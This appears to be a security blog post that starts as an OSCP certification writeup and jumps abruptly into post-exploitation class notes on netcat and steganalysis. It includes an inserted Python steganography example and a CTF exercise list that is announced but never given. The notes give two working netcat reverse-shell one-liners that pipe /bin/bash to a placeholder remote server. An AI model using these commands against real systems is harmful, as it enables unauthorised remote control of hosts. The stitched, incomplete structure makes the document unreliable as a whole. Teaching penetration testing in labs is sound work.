**Update (11/4/2016)** – added a few bits back in from this post
A few weeks ago, I “tried harder” and was awarded the Offensive Security Certified Professional (OSCP) certification.
As many people before me have done, I decided I’d post a little writeup of my experience with the Pentesting With Kali (PWK) online training and taking the OSCP exam (twice).
As you probably know by now, the OSCP is Offensive Security’s certification for penetration testing using the Linux distribution they maintain, Kali Linux. The accompanying course, Pentesting With Kali (PWK), gets you a PDF lab guide and a series of instruction videos covering the different topics of the guide, from basic network enumeration to writing buffer overflow exploits. You’re also purchasing VPN access to their hands-on lab environment of dozens of different vulnerable hosts for you to probe and exploit. To attain the OSCP certification, you take a hands-on exam in which you’re given VPN access to a special exam network and are allotted 24 hours to compromise as many systems as possible, plus an additional 24 hours to write up and submit your exam penetration test report.
I signed up for the 90-day course, bought a one-month extension after I ran out of time (mostly for going back over machines to write the huge lab report…more on that later), I bombed my first attempt at the exam, purchased a two-week extension in order to bone up on some stuff and get a retest attempt, then passed it on my second try.
The Cost, Signing Up, and Getting your Employer to Pay For It
I’ve wanted to take OffSec’s training for a long time and I should’ve just sucked it up, ponied up the money, and taken it years ago. I fought for over a year at my previous employer to get them to finance it. I was ready to give up arguing with them and buy it myself before I landed in my current job. Thankfully, where I work now has a healthy training budget for its pentesters and all I had to do was put it on the corporate card.
Lesson 7 – Post-Exploitation
- Netcat is a tool you will need to get very comfortable with as a pentester. Netcat is a simple but powerful utility that will allow you to listen on or transmit data over TCP or UDP ports. It ships with almost every Linux or Unix OS (including OS X) and versions are available for Windows and other OSes too.
- Some of the popular clones of netcat include ncat (which is part of the Nmap Project, comes bundled with it, and can SSL-encrypt your traffic with its --ssl option), socat, CryptCat (which encrypts your traffic with Twofish rather than SSL), and many others
- Steganography is one of those things you learn in security classes and is fun for hacker CTFs…but I’m not really sure how much it gets used by real attackers. Or even pentesters on engagements, for that matter.
- Stego-only attack: you only have the medium with the hidden data in it
- Known-cover attack: you have a copy of the original medium BEFORE data was hidden in it and a copy of it AFTER data is hidden
- Known-message attack: you have the medium with hidden data in it and you know what the hidden message is (can determine the steg algorithm with this info)
- Known-stego attack: you know the steg method used and you have access to the original and modified medium
- Chosen-stego attack: you have access to different steg tools and you try each of them and look for similarities to determine which method was used for the file you’re analysing
- Chosen-message attack: similar to the above, but using the same message in different tools to look for patterns or signatures
- When a disk-wiping tool is run on the very disk it lives on, the process might get far along, but eventually the program being used to trash the disk will delete itself and stall out, so there will still be something for forensic investigators to pick at…though who knows just what will remain.
- Besides the netcat man page, there are some good recipes buried in the /usr/share/doc/netcat-traditional/ directory on Kali. Check out README.Debian and README.gz. There are also some very interesting shell scripts that use netcat to do everything from IRC to acting as a crude web server down in the examples subdirectory.
- Besides all the different variants, there are two mainstream versions of netcat on Debian-family systems: netcat-traditional and netcat-openbsd. netcat-openbsd is the one Debian, Ubuntu, and their derivatives install by default (Red Hat and Fedora ship Nmap’s ncat as nc instead). The main difference is that the OpenBSD variant has had the “-e” option (run a program and hook it to the connection) removed, as a measure to prevent it being used to leave backdoors. On Debian-based systems nc is an alternatives symlink, so check which binary it actually resolves to before assuming “-e” is there; on Kali the traditional build is also reachable directly as nc.traditional.
- Fortunately, there are two different options for sending out a reverse shell without having to use the “-e” flag. Both use a named pipe to feed what netcat receives into a shell and to feed the shell’s output back into netcat:
1.) `mknod backpipe p && nc <remote server> <port> 0<backpipe | /bin/bash 1>backpipe` (only stdout is wired back, so error messages are lost)
2.) `mkfifo pipe && nc <remote server> <port> < pipe | /bin/bash &> pipe` <——– this one is better, because it also sends stderr back to you (so you can see error messages). Note that `&>` is a bash-ism: if the command ends up being run by /bin/sh, write `/bin/bash > pipe 2>&1` instead. Either way the named pipe is left behind in the working directory, so remove it when you are done.
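The steganalysis attack classes listed above are easier to see on a toy scheme. The following Python is an added example (not code from the original post): it hides a short ASCII message in the least significant bits of a constructed byte string that stands in for 8-bit image samples, then runs a known-cover attack (diff against the original, which pins down the method and the payload size) and a stego-only check (a structural tell for ASCII in the LSB plane, usable when no original exists). COVER, MESSAGE and the function names are illustrative assumptions, and the cover is deliberately synthetic so the results are reproducible rather than realistic.

```python
"""Known-cover versus stego-only analysis of a toy LSB scheme.
Added example, not code from the original post. COVER is a constructed
byte string standing in for 8-bit samples; no real image format is parsed."""

# Constructed cover: a deterministic 256-sample curve whose LSB plane is all 1s
# (i*i + 3*i is always even, so i*i + 3*i + 7 is always odd).
COVER = bytes((i * i + 3 * i + 7) & 0xFF for i in range(256))
MESSAGE = b"meet at 0300"


def lsb_embed(cover, message):
    """Write the message bits, MSB first, into the LSB of successive samples."""
    bits = [(byte >> i) & 1 for byte in message for i in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError("cover too small for message")
    stego = bytearray(cover)
    for pos, bit in enumerate(bits):
        stego[pos] = (stego[pos] & 0xFE) | bit
    return bytes(stego)


def lsb_extract(stego, nbytes):
    """Read nbytes back out of the LSB plane."""
    out = bytearray()
    for k in range(nbytes):
        value = 0
        for pos in range(k * 8, k * 8 + 8):
            value = (value << 1) | (stego[pos] & 1)
        out.append(value)
    return bytes(out)


def known_cover_attack(cover, stego):
    """Known-cover attack: with the original in hand a plain diff shows which
    samples changed and that every change is confined to the LSB, which both
    identifies the method and bounds the payload. Samples that already held
    the right bit are untouched, so the payload ends at the last changed
    sample, rounded up to a whole hidden byte."""
    changed = [i for i, (c, s) in enumerate(zip(cover, stego)) if c != s]
    lsb_only = all((c ^ s) == 1 for c, s in zip(cover, stego) if c != s)
    payload_bytes = (changed[-1] // 8 + 1) if changed else 0
    return changed, lsb_only, payload_bytes


def ascii_run_length(stego):
    """Stego-only attack: no original to diff against, so look for a structural
    tell. ASCII has the top bit of every byte clear, so in the payload region
    every 8th LSB (the MSB of each hidden byte) is 0. Count how many such bytes
    run from sample 0 before the first 1 appears; on an unmodified cover with a
    noisy LSB plane the run dies out almost immediately."""
    run = 0
    for pos in range(0, len(stego) - 7, 8):
        if stego[pos] & 1:
            break
        run += 1
    return run


if __name__ == "__main__":
    stego = lsb_embed(COVER, MESSAGE)
    changed, lsb_only, n = known_cover_attack(COVER, stego)
    print(f"{len(changed)} samples changed, LSB-only={lsb_only}, payload={n} bytes")
    print("recovered:", lsb_extract(stego, n))
    print("stego-only ASCII run:", ascii_run_length(stego), "vs cover:", ascii_run_length(COVER))
```

On a real image the LSB plane is noisy rather than all ones, so the stego-only check would need a longer message or a proper statistical test (chi-square on LSB pairs, for example) before it said anything with confidence; the known-cover diff, by contrast, is conclusive at any message length.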
This is the point in the class where I would start doing actual CTF challenges with the students. What I usually did was create several VMs on the class server (I didn’t need much horsepower; an old laptop running Linux Mint with about 4GB of RAM sufficed just fine) and assign one to each student for them to hack. I had pretty small classes, so this was doable. I would give them hints, answer questions, guide them in the right direction, get them to help each other out, etc. until they finally solved it.
But for you reading along at home, you should now know enough to try to tackle some of these CTF VMs yourself. Here are the first few I started them out on:
You can easily download the ISO images and run them in VMware or VirtualBox. I urge you to try to solve them on your own. The De-ICE ones do have a hint page in the target machine’s website. If you get really desperate, you can always look at the walkthroughs on their respective VulnHub pages.